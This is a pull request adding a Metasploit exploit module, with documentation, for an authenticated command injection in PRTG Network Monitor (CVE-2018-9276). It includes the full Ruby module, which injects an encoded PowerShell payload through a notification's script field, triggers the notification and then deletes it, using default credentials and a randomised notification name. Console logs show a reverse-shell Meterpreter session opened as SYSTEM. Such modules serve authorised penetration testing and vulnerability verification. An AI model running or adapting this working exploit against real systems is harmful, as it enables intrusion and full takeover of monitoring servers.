### PR TITLE
Add PRTG Network Monitor RCE (CVE-2018-9276)

### DIFF
--- a/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command injection vulnerability in PRTG Network Monitor product (CVE-2018-9276).
+
+Notifications can be created by an authenticated user and can execute scripts when triggered. Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command, allowing command execution under the context of privileged user.
+
+The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.
+
+This vulnerability affects versions prior to 18.2.39.
+
+**Vulnerable Application Installation**
+
+PRTG provides a trial version for free (https://www.paessler.com/prtg/download) but it is always updated to the latest version, which won't allow you to test for the vulnerability.
+
+While a version history can be found on the vendor's website (https://www.paessler.com/prtg/history) it does not provide any download link. The solution I found to get old versions was to Google "PRTG Network Monitor 18 trial download" and hopefully found archived trial versions to download (ex : https://prtg-network-monitor.informer.com/versions/). There were not coming from the official website and no hash was provided by the vendor to verify the file integrity, so I made sure to execute them in a sandboxed environment.
+
+Once downloaded the setup is pretty straightforward, a trial link to PRTG website is provided for a free trial license key to enter. Once deployed the service is available on port 80 with the default credentials `prtgadmin`/`prtgadmin`. Any configuration can be made through the web interface or with `PRTG Enterprise Console` (automatically installed). Note that you may need to wait a few minutes for the setup to complete totally.
+
+PRTG Network Monitor is also available on the "Netmon" lab from Hack The Box, it is quite useful for testing because easy to deploy and reset, but requires a premium account (10£/month).
+
+**Successfully tested on**
+
+- PRTG Network Monitor 18.1.38.11958 on Windows 2012 R2 x64 (downloaded from https://prtg-network-monitor.informer.com/18.1)
+- PRTG Network Monitor 18.1.37.13946 on Windows 2016+ x64 (on the Hack The Box machine)
+
+## Verification Steps
+1. Install the application
+1. Start `msfconsole`
+1. Do: `use exploit/windows/http/prtg_authenticated_rce`
+1. Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
+1. Do: set `RHOST`, `LHOST` and HTTP-specific parameters if needed
+1. Do: set `ADMIN_USERNAME` and `ADMIN_PASSWORD` with PRTG Network Monitor credentials (default `prtgadmin`/`prtgadmin`)
+1. Do: `chek` 
+1. **Verify** that you are seeing `The target is vulnerable.` in console.
+1. Do: `run` 
+1. **Verify** that you are seeing success logs in console (successfully logged in, created notification, etc..)
+1. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
+1. You should get a shell
+
+In my experience steps 10-12 may require a few tries to work because notifications are queued up before execution on the server. Augmenting `WfsDelay` to 30 seconds did the trick, so it is set by default.
+
+## Options
+**ADMIN_USERNAME**
+
+PRTG Network Monitor's account that has the right to create Notifications (allowed by default on the initial account).
+
+**ADMIN_PASSWORD**
+
+The password associated with the specified username.
+
+**VERBOSE**
+
+Setting `VERBOSE` to `true` displays the raw Powershell payload in console for manual testing.
+
+## Scenarios
+Checking if a target is vulnerable based on the version in use :
+
+```
+msf6 > use exploit/windows/http/prtg_authenticated_rce 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOST x.x.x.x
+RHOST => x.x.x.x
+msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST y.y.y.y
+LHOST => y.y.y.y
+msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_USERNAME prtgadmin
+ADMIN_USERNAME => prtgadmin
+msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD prtgadmin
+ADMIN_PASSWORD => prtgadmin
+msf6 exploit(windows/http/prtg_authenticated_rce) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(windows/http/prtg_authenticated_rce) > check
+
+[*] Identified PRTG Network Monitor Version 18.1.37.13946
+[*] x.x.x.x:80 - The target appears to be vulnerable.
+```
+
+Getting a shell on PRTG Network Monitor using a sufficiently privileged account credentials :
+
+```
+msf6 > use exploit/windows/http/prtg_authenticated_rce
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOST x.x.x.x
+RHOST => x.x.x.x
+msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST y.y.y.y
+LHOST => y.y.y.y
+msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_USERNAME prtgadmin
+ADMIN_USERNAME => prtgadmin
+msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD prtgadmin
+ADMIN_PASSWORD => prtgadmin
+msf6 exploit(windows/http/prtg_authenticated_rce) > run
+
+[*] Started reverse TCP handler on y.y.y.y:4444 
+[+] Successfully logged in with provided credentials
+[+] Created malicious notification (objid=zzzz)
+[+] Triggered malicious notification
+[+] Deleted malicious notification
+[*] Waiting for payload execution.. (30 sec. max)
+[*] Sending stage (175174 bytes) to x.x.x.x
+[*] Meterpreter session 1 opened (y.y.y.y:4444 -> x.x.x.x:49223) at 2021-01-18 11:04:22 +0100
+
+meterpreter > getuid
+Server username: AUTORITE NT\System
+```

--- a/modules/exploits/windows/http/prtg_authenticated_rce.rb
+++ b/modules/exploits/windows/http/prtg_authenticated_rce.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'X-Requested-With' => 'XMLHttpRequest'
         },
         'vars_post' => {
-          'name_' => 'Exploit', # may be changed for discretion purposes
+          'name_' => Rex::Text.rand_text_alphanumeric(4..24),
           'active_' => '1',
           'schedule_' => '-1|None|',
           'postpone_' => '1',

--- a/modules/exploits/windows/http/prtg_authenticated_rce.rb
+++ b/modules/exploits/windows/http/prtg_authenticated_rce.rb
@@ -1,0 +1,283 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "PRTG Network Monitor Authenticated RCE",
+      'Description'    => %q{
+        Notifications can be created by an authenticated user and can execute scripts when triggered.
+        Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command allowing command execution under the context of privileged user.
+        The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.
+        It may require a few tries to get a shell because notifications are queued up on the server.
+        This vulnerability affects versions prior to 18.2.39. See references for more details about the vulnerability allowing RCE.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Josh Berry <josh.berry[at]codewatch.org>', # original discovery
+          'Julien Bedel <contact[at]julienbedel.com>', # module writer
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-9276'],
+          ['URL', 'https://www.codewatch.org/blog/?p=453']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'WfsDelay' => 30 # because notification triggers are queuded up on the server
+      },
+      'DisclosureDate' => '2018-06-25'))
+
+    register_options(
+      [
+        OptString.new('ADMIN_USERNAME', [true, 'The username to authenticate as', 'prtgadmin']),
+        OptString.new('ADMIN_PASSWORD', [true, 'The password for the specified username', 'prtgadmin'])
+      ]
+    )
+  end
+
+  def prtg_connect
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(datastore['URI'], 'public', 'checklogin.htm'),
+        'vars_post' => {
+          'loginurl' => '',
+          'username' => datastore['ADMIN_USERNAME'],
+          'password' => datastore['ADMIN_PASSWORD']
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to reach remote host')
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 302 && res.headers['LOCATION'] == '/home' && res.get_cookies
+      @cookies = res.get_cookies.to_s
+      print_good('Successfully logged in with provided credentials')
+      vprint_status("Session cookies : #{@cookies}")
+    else
+      fail_with(Failure::NoAccess, 'Failed to authenticate to the web interface')
+    end
+
+  end
+
+  def prtg_create_notification(cmd)
+    uri = datastore['URI']
+
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(uri, 'editsettings'),
+        'cookie'   => @cookies,
+        'headers'  => {
+          'X-Requested-With' => 'XMLHttpRequest'
+        },
+        'vars_post' => {
+          'name_' => 'Exploit', # may be changed for discretion purposes
+          'active_' => '1',
+          'schedule_' => '-1|None|',
+          'postpone_' => '1',
+          'summode_' => '2',
+          'summarysubject_' => '[%sitename] %summarycount Summarized Notifications',
+          'summinutes_' => '1',
+          'accessrights_' => '1',
+          'accessrights_201' => '0',
+          'active_1' => '0',
+          'addressuserid_1' => '-1',
+          'addressgroupid_1' => '-1',
+          'subject_1' => '[%sitename] %device %name %status %down (%message)',
+          'contenttype_1' => 'text/html',
+          'priority_1' => '0',
+          'active_17' => '0',
+          'addressuserid_17' => '-1',
+          'addressgroupid_17' => '-1',
+          'message_17' => '[%sitename] %device %name %status %down (%message)',
+          'active_8' => '0',
+          'addressuserid_8' => '-1',
+          'addressgroupid_8' => '-1',
+          'message_8' => '[%sitename] %device %name %status %down (%message)',
+          'active_2' => '0',
+          'eventlogfile_2' => 'application',
+          'sender_2' => 'PRTG Network Monitor',
+          'eventtype_2' => 'error',
+          'message_2' => '[%sitename] %device %name %status %down (%message)',
+          'active_13' => '0',
+          'syslogport_13' => '514',
+          'syslogfacility_13' => '1',
+          'syslogencoding_13' => '1',
+          'message_13' => '[%sitename] %device %name %status %down (%message)',
+          'active_14' => '0',
+          'snmpport_14' => '162',
+          'snmptrapspec_14' => '0',
+          'messageid_14' => '0',
+          'message_14' => '[%sitename] %device %name %status %down (%message)',
+          'active_9' => '0',
+          'urlsniselect_9' => '0',
+          'active_10' => '10',
+          'address_10' => 'Demo EXE Notification - OutFile.ps1',
+          'message_10' => "abcd; #{cmd}",
+          'timeout_10' => '60',
+          'active_15' => '0',
+          'message_15' => '[%sitename] %device %name %status %down (%message)',
+          'active_16' => '0',
+          'isusergroup_16' => '1',
+          'addressgroupid_16' => '200|PRTG Administrators',
+          'ticketuserid_16' => '100|PRTG System Administrator',
+          'subject_16' => '%device %name %status %down (%message)',
+          'message_16' => 'Sensor: %name\r\nStatus: %status %down\r\n\r\nDate/Time: %datetime (%timezone)\r\nLast Result: %lastvalue\r\nLast Message: %message\r\n\r\nProbe: %probe\r\nGroup: %group\r\nDevice: %device (%host)\r\n\r\nLast Scan: %lastcheck\r\nLast Up: %lastup\r\nLast Down: %lastdown\r\nUptime: %uptime\r\nDowntime: %downtime\r\nCumulated since: %cumsince\r\nLocation: %location\r\n\r\n',
+          'autoclose_16' => '1',
+          'objecttype' => 'notification',
+          'id' => 'new',
+          'targeturl' => '/myaccount.htm?tabid=2'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to reach remote host')
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200 && res.get_json_document['objid'] && !res.get_json_document['objid'].empty?
+      @objid = res.get_json_document['objid']
+      print_good("Created malicious notification (objid=#{@objid})")
+      vprint_status("Payload : #{cmd}")
+    else
+      fail_with(Failure::Unknown, 'Failed to create malicious notification')
+    end
+
+  end
+
+  def prtg_trigger_notification
+    uri = datastore['URI']
+
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(uri, 'api', 'notificationtest.htm'),
+        'cookie'   => @cookies,
+        'headers'  => {
+          'X-Requested-With' => 'XMLHttpRequest'
+        },
+        'vars_post' => {
+          'id' => @objid
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to reach remote host')
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200 && (res.to_s.include? 'EXE notification is queued up')
+      print_good('Triggered malicious notification')
+    else
+      fail_with(Failure::Unknown, 'Failed to trigger malicious notification')
+    end
+
+  end
+
+  def prtg_delete_notification
+    uri = datastore['URI']
+
+    begin
+      res = send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => normalize_uri(uri, 'api', 'deleteobject.htm'),
+        'cookie'   => @cookies,
+        'headers'  => {
+          'X-Requested-With' => 'XMLHttpRequest'
+        },
+        'vars_post' => {
+          'id' => @objid,
+          'approve' => '1'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to reach remote host')
+    ensure
+      disconnect
+    end
+
+    if res
+      print_good('Deleted malicious notification')
+    else
+      fail_with(Failure::Unknown, 'Failed to delete malicious notification')
+    end
+
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'], '/index.htm')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200
+      # checks for PRTG version in http headers first, if not found looks for it in html
+      version_match = /\d{1,2}\.\d{1}\.\d{1,2}\.\d*/
+      prtg_server_header = res.headers['Server']
+      if prtg_server_header && prtg_server_header =~ version_match
+        prtg_version = prtg_server_header[version_match]
+      else
+        html = res.get_html_document
+        prtg_version_html = html.at('span[@class="prtgversion"]')
+        if prtg_version_html && prtg_version_html.text =~ version_match
+          prtg_version = prtg_version_html.text[version_match]
+        end
+      end
+
+      if prtg_version
+        vprint_status("Identified PRTG Network Monitor Version #{prtg_version}")
+        if Gem::Version.new(prtg_version) < Gem::Version.new('18.2.39')
+          return CheckCode::Appears
+        else
+          return CheckCode::Safe
+        end
+      elsif (prtg_server_header.include? 'PRTG') || (html.to_s.include? 'PRTG')
+        return CheckCode::Detected
+      end
+    end
+
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    powershell_options = {
+      #method: 'direct',
+      remove_comspec: true,
+      wrap_double_quotes: true,
+      encode_final_payload: true
+    }
+    ps_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
+    prtg_connect
+    prtg_create_notification(ps_payload)
+    prtg_trigger_notification
+    prtg_delete_notification
+    print_status("Waiting for payload execution.. (#{datastore['WfsDelay']} sec. max)")
+  end
+
+end


### PR DESCRIPTION
This PR adds a command injection exploit targeting PRTG Network Monitor product (CVE-2018-9276).

Notifications can be created by an authenticated user and can execute scripts when triggered. Due to a poorly validated input on the script name, it is possible to chain it with a user-supplied command, allowing command execution under the context of privileged user.

The module uses provided credentials to log in to the web interface, then creates and triggers a malicious notification to perform RCE using a Powershell payload.

This vulnerability affects versions prior to 18.2.39. Successfully tested on :
- PRTG Network Monitor 18.1.38.11958 on Windows 2012 R2 x64
- PRTG Network Monitor 18.1.37.13946 on Windows 2016+ x64

Note that instructions for installation are provided in documentation.

## Verification Steps

- [x] Install the application
- [x] Start `msfconsole`
- [x] Do: `use exploit/windows/http/prtg_authenticated_rce`
- [x] Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] Do: set `RHOST`, `LHOST` and HTTP-specific parameters if needed
- [x] Do: set `ADMIN_USERNAME` and `ADMIN_PASSWORD` with PRTG Network Monitor credentials (default `prtgadmin`/`prtgadmin`)
- [x] Do: `check` 
- [x] **Verify** that you are seeing `The target is vulnerable.` in console.
- [x] Do: `run` 
- [x] **Verify** that you are seeing success logs in console (successfully logged in, created notification, etc..)
- [x] Wait for the payload to be executed on the server
- [x] **Verify** that you are seeing `Sending stage to <TARGET>` in console.
- [x] You should get a shell

In my experience the last 3 steps may require a few tries to work because notifications are queued up before execution on the server. Augmenting `WfsDelay` to 30 seconds did the trick, so it is set by default.

## Options

**ADMIN_USERNAME**

PRTG Network Monitor's account that has the right to create Notifications (allowed by default on the initial account).

**ADMIN_PASSWORD**

The password associated with the specified username.

**VERBOSE**

Setting `VERBOSE` to `true` displays the raw Powershell payload in console for manual testing.

## Scenarios

Getting a shell on PRTG Network Monitor using a sufficiently privileged account credentials :

```
msf6 > use exploit/windows/http/prtg_authenticated_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_USERNAME prtgadmin
ADMIN_USERNAME => prtgadmin
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD prtgadmin
ADMIN_PASSWORD => prtgadmin
msf6 exploit(windows/http/prtg_authenticated_rce) > run

[*] Started reverse TCP handler on y.y.y.y:4444 
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=zzzz)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (175174 bytes) to x.x.x.x
[*] Meterpreter session 1 opened (y.y.y.y:4444 -> x.x.x.x:49223) at 2021-01-18 11:04:22 +0100

meterpreter > getuid
Server username: NT AUTHORITY\System
```